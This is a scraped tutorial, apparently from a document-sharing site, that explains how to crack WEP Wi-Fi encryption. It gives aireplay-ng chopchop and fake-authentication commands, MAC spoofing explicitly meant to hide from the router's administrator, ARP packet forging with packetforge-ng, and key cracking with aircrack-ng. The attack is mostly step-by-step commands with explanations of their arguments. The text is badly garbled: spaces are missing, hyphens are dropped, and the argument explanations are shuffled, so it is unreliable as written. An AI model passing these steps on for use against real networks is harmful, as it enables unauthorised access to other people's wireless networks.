Beruflich Dokumente
Kultur Dokumente
idon'thaveanydataonmine(asihavenowirelessdevicesconnectedtoit) Nowwearecapturingdata,wewillneedabout200000to1000000ofthesetocrackwep. whilethat'srunningopenanewkonsoleandnowwewillspeedupthetraffic(ifyouhavewireless devicesandthedataisgoingupfastenoughthenyoudontneedtodothisstage) wewillnowsetupamethodcalledchopchop,thisisinaireplayng(run"aireplayng"likewedid airodumpngtoseealltheoptions)anditwillcaptureanddataandresenditoverandovertomake thetrafficonthenetworksowecancapturemore. thecommandtodothisis: aireplayngchopchopb00:0F:3D:3D:94:72ath1 aireplayng chopchop b00:0F:3D:3D:94:72 showsit) ath1 =theprogramname =theattackweareuseing =ourAP'sMACaddress(kismethasthisinfoandairosumpalso =ournetworkinterface
todothisweopenanotherkonsoleandusetheaireplayngcommandagainbutadifferentattack method aireplayngfakeauth50eCrossovera00:0F:3D:3D:94:72h11:22:33:44:55:66ath1 aireplayng =theprogramname fakeauth50 =theattackweareusingwiththedelayof50 eCrossover =thenameoftheAP a00:0F:3D:3D:94:72 =ourAP'sMACaddress h11:22:33:44:55:66 =afakemacaddressforustoattackfromsotheroutersadmincantseeour realmacaddress ath1 =ournetworkinterface weshouldsee SendingAuthenticationRequest Authenticationsuccessful
youwillnoticeairodumphasgonecrazytooandlotsofclientsconnectedtotheAP letitrunitsmagictillthechopchophits100%
nowwehaveacapandxorfile,wewillturnthisintoafilewecansendbacktotheAP. todothisrunanappcalledarpforgeng thiswilleditthecaptureslightly,imnotgoingtogointodetailaboutthisapp. arpforgengreplay_dec0831173203.xor100:0F:3D:3D:94:7211:22:33:44:55:66192.168.0.200 192.168.0.1arp.cap arpforgeng replay_dec0831173203.xor willbeslightlydifferent 1 00:0F:3D:3D:94:72 11:22:33:44:55:66 192.168.0.200 =theprogramname =thexorfilethatwascaughtbythechopchopmethod,yours =thetypeweareusing =theAP'smacaddress =ourfakemac =theipsource,thiscanbeanything
=thedestination,thisistheAP'sip =thenewcapturefilename
thedatainairodumpshouldnowberisingveryfast
aircracknga1eCrossoverb00:0F:3D:3D:94:72weptutorial02.cap aircrackng a1 eCrossover b00:0F:3D:3D:94:72 weptutorial02.cap =theprogramname =thisistochoosewhatwearecracking1=wep,2=wpapsk =theAPname =theapmacaddress =thisisthecapturefilethatyoucalledwhenyoustarted airodump,itwillprobadd01toyoursbutasialreadyhadone calledthatitmadeit02,justusetabtofindoutorlookinthe folder
Itisnowtestingyourkeysandhopefullythiswillfindyourkey(thiswillalsotaketime,makea sandwich)
remember,thehighertheencryptionthelongeritcantake.
iftheaircrackfailsjustrestartitandletitcatchmoredata,forthistutorialineededover800000